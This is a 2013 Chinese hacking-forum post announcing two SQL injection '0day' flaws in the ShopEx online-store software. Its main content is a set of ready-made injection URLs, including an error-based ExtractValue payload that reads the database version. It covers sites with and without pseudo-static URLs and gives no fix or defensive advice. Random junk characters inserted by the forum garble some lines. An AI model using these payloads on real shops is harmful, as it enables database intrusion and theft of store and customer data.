找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1924|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-4 16:20:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
( R8 u* w) m( l" H0 K0 B) H: X5 x: K
好吧,我扯远了~~" [1 W% l5 i. P
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
% R) j; ^/ t$ _/ e$ d不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:1 _- r# F) [$ ~. L- K& A( t8 s

+ ?* Y5 x8 W- dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' p6 G( D5 z( _# \
$ V' L7 y, I; a; ^7 h# a9 S% Xhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
6 L2 A7 [8 X7 c! C  i0 a
" [, |5 M4 n4 [; }; j( xhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html; `5 S/ p4 S1 B3 B
% t% H; k5 b# l: Y1 U
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
7 `. w1 G# M) i1 ?# p" V
7 x; x# N' E1 Y8 Y# E& m7 J 9 h; h+ |% o9 K, }# N
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。  a# t2 [" h/ I1 ]
如何注入就不多说了,10多年的东西了…不会也会了…
1 w! g6 U' ~& V) E2 X7 ]
7 ~$ V! h/ n" T% g/ i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表